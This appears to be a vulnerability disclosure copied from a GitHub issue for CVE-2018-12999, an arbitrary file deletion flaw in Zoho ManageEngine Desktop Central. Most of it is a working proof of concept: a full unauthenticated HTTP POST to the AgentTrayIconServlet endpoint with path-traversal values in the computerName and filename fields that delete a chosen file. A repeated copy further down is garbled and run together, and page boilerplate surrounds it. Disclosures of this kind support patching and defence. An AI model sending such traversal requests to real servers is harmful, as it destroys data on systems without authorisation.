1. choose a useless file for test, ex: /images/demo/loginas_bottom.gif
2. send payload below:
POST /agenttrayicon HTTP/1.1
Host: 192.168.1.203:8020
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 129
screenShotAttached=yes&video_type=2&customerId=1&computerName=../../../&resourceId=xxx&filename=../images/demo/loginas_bottom.gif
3. Visit again the file has beed deleted
notice: It can be successfully reproduced without login info.
The text was updated successfully, but these errors were encountered:
unh3x
changed the title
Zoho manageengine Desktop Central Arbitrary File Deletion
[CVE-2018-12999]Zoho manageengine Desktop Central Arbitrary File Deletion
Jun 29, 2018
=================
Zoho manageengine Desktop Central Arbitrary File Deletion
Date: 2018/06/20
Software Link: https://www.manageengine.com/products/desktop-central/
Category: Web Application
Exploit Author: M3@pandas From DBAppSecurity
CVE: CVE-2018-12999
=================
Vulnerable cgi
com.adventnet.sym.webclient.statusupdate.AgentTrayIconServlet
=================
Proof of Concept:
1. choose a useless file for test, ex: /images/demo/loginas_bottom.gif3. Visit again the file has beed deletednotice: It can be successfully reproduced without login info.
The text was updated successfully, but these errors were encountered: